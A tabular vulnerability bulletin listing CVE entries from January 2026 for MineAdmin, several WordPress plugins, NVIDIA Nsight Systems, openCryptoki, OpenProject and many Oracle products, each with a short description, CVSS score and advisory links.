| MineAdmin--MineAdmin | A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 5.3 | CVE-2026-1194 | VDB-341779 | MineAdmin Swagger information disclosure VDB-341779 | CTI Indicators (IOB, IOC, TTP) Submit #734271 | MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x Swagger Information Leakage Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/5 |
| MineAdmin--MineAdmin | A weakness has been identified in MineAdmin 1.x/2.x. This impacts the function refresh of the file /system/refresh of the component JWT Token Handler. This manipulation causes insufficient verification of data authenticity. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 5 | CVE-2026-1195 | VDB-341780 | MineAdmin JWT Token refresh data authenticity VDB-341780 | CTI Indicators (IOB, IOC, IOA) Submit #734272 | MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x Flaw Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/4 |
| neop--Postalicious | The Postalicious plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1266 | https://www.wordfence.com/threat-intel/vulnerabilities/id/512c9a2f-b023-4e28-8dd8-35795e68a8b3?source=cve https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L316 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L316 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L533 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L533 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L541 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L541 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L548 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L548 |
| nhomcaodem--Viet contact | The Viet contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-20 | 4.4 | CVE-2026-1045 | https://www.wordfence.com/threat-intel/vulnerabilities/id/131a6a35-e0d2-4613-8614-24bf11011098?source=cve https://plugins.trac.wordpress.org/browser/viet-contact/trunk/inc/vietcontact-admin.php#L34 https://plugins.trac.wordpress.org/browser/viet-contact/trunk/inc/vietcontact-content.php#L11 |
| norcross--WP Hello Bar | The WP Hello Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'digit_one' and 'digit_two' parameters in all versions up to, and including, 1.02 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 4.4 | CVE-2026-1042 | https://www.wordfence.com/threat-intel/vulnerabilities/id/73b55486-adb8-40c6-9113-c98618d9cb00?source=cve https://downloads.wordpress.org/plugin/wp-hello-bar.1.02.zip https://wordpress.org/plugins/wp-hello-bar/ https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L214 https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L222 https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L152 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems for Windows contains a vulnerability in the application's DLL loading mechanism where an attacker could cause an uncontrolled search path element by exploiting insecure DLL search paths. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service and information disclosure. | 2026-01-20 | 6.7 | CVE-2025-33231 | https://nvd.nist.gov/vuln/detail/CVE-2025-33231 https://www.cve.org/CVERecord?id=CVE-2025-33231 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| opencryptoki--opencryptoki | openCryptoki is a PKCS#11 library and provides tooling for Linux and AIX. Versions 2.3.2 and above are vulnerable to symlink-following when running in privileged contexts. A token-group user can redirect file operations to arbitrary filesystem targets by planting symlinks in group-writable token directories, resulting in privilege escalation or data exposure. Token and lock directories are 0770 (group-writable for token users), so any token-group member can plant files and symlinks inside them. When run as root, the base code handling token directory file access, as well as several openCryptoki tools used for administrative purposes, may reset ownership or permissions on existing files inside the token directories. An attacker with token-group membership can exploit the system when an administrator runs a PKCS#11 application or administrative tool that performs chown on files inside the token directory during normal maintenance. This issue is fixed in commit 5e6e4b4, but has not been included in a released version at the time of publication. | 2026-01-22 | 6.8 | CVE-2026-23893 | https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-j6c7-mvpx-jx5q https://github.com/opencryptoki/opencryptoki/commit/5e6e4b42f2b1fcc1e4ef1b920e463bfa55da8b45 |
| OpenEMR Foundation, Inc.--OpenEMR | OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. Attackers can exploit the vulnerability by crafting a malicious payload to download and execute a web shell, enabling remote command execution on the vulnerable OpenEMR instance. | 2026-01-21 | 5.4 | CVE-2021-47817 | ExploitDB-49784 OpenEMR Official Website OpenEMR 5.0.2.1 Download SonarSource Vulnerability Analysis Vulnerability Demonstration Video VulnCheck Advisory: OpenEMR 5.0.2.1 - Remote Code Execution |
| opf--openproject | OpenProject is an open-source, web-based project management software. Users of OpenProject versions prior to 16.6.5 and 17.0.1 have the ability to view and end their active sessions via Account Settings → Sessions. When deleting a session, it was not properly checked if the session belongs to the user. As the ID that is used to identify these session objects use incremental integers, users could iterate requests using `DELETE /my/sessions/:id` and thus unauthenticate other users. Users did not have access to any sensitive information (like browser identifier, IP addresses, etc) of other users that are stored in the session. The problem was patched in OpenProject versions 16.6.5 and 17.0.1. No known workarounds are available as this does not require any permissions or other that can temporarily be disabled. | 2026-01-19 | 6.5 | CVE-2026-23646 | https://github.com/opf/openproject/security/advisories/GHSA-w422-xf8f-v4vp https://github.com/opf/openproject/releases/tag/v16.6.5 https://github.com/opf/openproject/releases/tag/v17.0.1 |
| opf--openproject | OpenProject is an open-source, web-based project management software. When using groups in OpenProject to manage users, the group members should only be visible to users that have the View Members permission in any project that the group is also a member of. Prior to versions 17.0.1 and 16.6.5, due to a failed permission check, if a user had the View Members permission in any project, they could enumerate all Groups and view which other users are part of the group. The issue has been fixed in OpenProject 17.0.1 and 16.6.5. No known workarounds are available. | 2026-01-19 | 4.3 | CVE-2026-23721 | https://github.com/opf/openproject/security/advisories/GHSA-vj77-wrc2-5h5h |
| Oracle Corporation--JD Edwards EnterpriseOne Tools | Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.26.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21946 | Oracle Advisory |
| Oracle Corporation--MySQL Cluster | Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21936 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21949 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21950 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21968 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 5.3 | CVE-2026-21929 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21937 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21941 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21948 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21952 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Thread Pooling). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21964 | Oracle Advisory |
| Oracle Corporation--Oracle Agile Product Lifecycle Management for Process | Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Product Quality Management). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile Product Lifecycle Management for Process accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21944 | Oracle Advisory |
| Oracle Corporation--Oracle APEX Sample Applications | Vulnerability in the Oracle APEX Sample Applications product of Oracle APEX (component: Brookstrut Sample App). Supported versions that are affected are 23.2.0, 23.2.1, 24.1.0, 24.2.0 and 24.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle APEX Sample Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle APEX Sample Applications, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle APEX Sample Applications accessible data as well as unauthorized read access to a subset of Oracle APEX Sample Applications accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21931 | Oracle Advisory |
| Oracle Corporation--Oracle Applications DBA | Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications DBA accessible data as well as unauthorized access to critical data or complete access to all Oracle Applications DBA accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 6.5 | CVE-2026-21960 | Oracle Advisory |
| Oracle Corporation--Oracle Configurator | Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Configurator accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21972 | Oracle Advisory |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.29 and 21.3-21.20. Easily exploitable vulnerability allows high privileged attacker having Authenticated User privilege with network access via Oracle Net to compromise Java VM. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Java VM. CVSS 3.1 Base Score 4.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.5 | CVE-2026-21975 | Oracle Advisory |
| Oracle Corporation--Oracle FLEXCUBE Universal Banking | Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Relationship Pricing). Supported versions that are affected are 14.0.0.0.0-14.8.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21978 | Oracle Advisory |
| Oracle Corporation--Oracle Hospitality OPERA 5 Property Services | Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Opera). Supported versions that are affected are 5.6.19.23, 5.6.25.17, 5.6.26.10 and 5.6.27.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality OPERA 5 Property Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized read access to a subset of Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21966 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21933 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 4.8 | CVE-2026-21925 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Coding | Vulnerability in the Oracle Life Sciences Central Coding product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Coding. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Life Sciences Central Coding accessible data as well as unauthorized read access to a subset of Oracle Life Sciences Central Coding accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 6.5 | CVE-2026-21980 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Life Sciences Central Designer accessible data as well as unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 6.5 | CVE-2026-21923 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21970 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21974 | Oracle Advisory |
| Oracle Corporation--Oracle Planning and Budgeting Cloud Service | Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to <a href="https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html">Downloading the EPM Agent for more information. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N). | 2026-01-20 | 4.2 | CVE-2026-21922 | Oracle Advisory |
| Oracle Corporation--Oracle Planning and Budgeting Cloud Service | Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to <a href="https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html">Downloading the EPM Agent for more information. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N). | 2026-01-20 | 4.2 | CVE-2026-21979 | Oracle Advisory |
| Oracle Corporation--Oracle Scripting | Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Scripting Admin). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Scripting. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Scripting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Scripting accessible data as well as unauthorized read access to a subset of Oracle Scripting accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21943 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Driver). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data as well as unauthorized access to critical data or complete access to all Oracle Solaris accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). | 2026-01-20 | 5.8 | CVE-2026-21927 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21928 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Driver). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data as well as unauthorized access to critical data or complete access to all Oracle Solaris accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). | 2026-01-20 | 5.8 | CVE-2026-21935 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H). | 2026-01-20 | 5 | CVE-2026-21942 | Oracle Advisory |
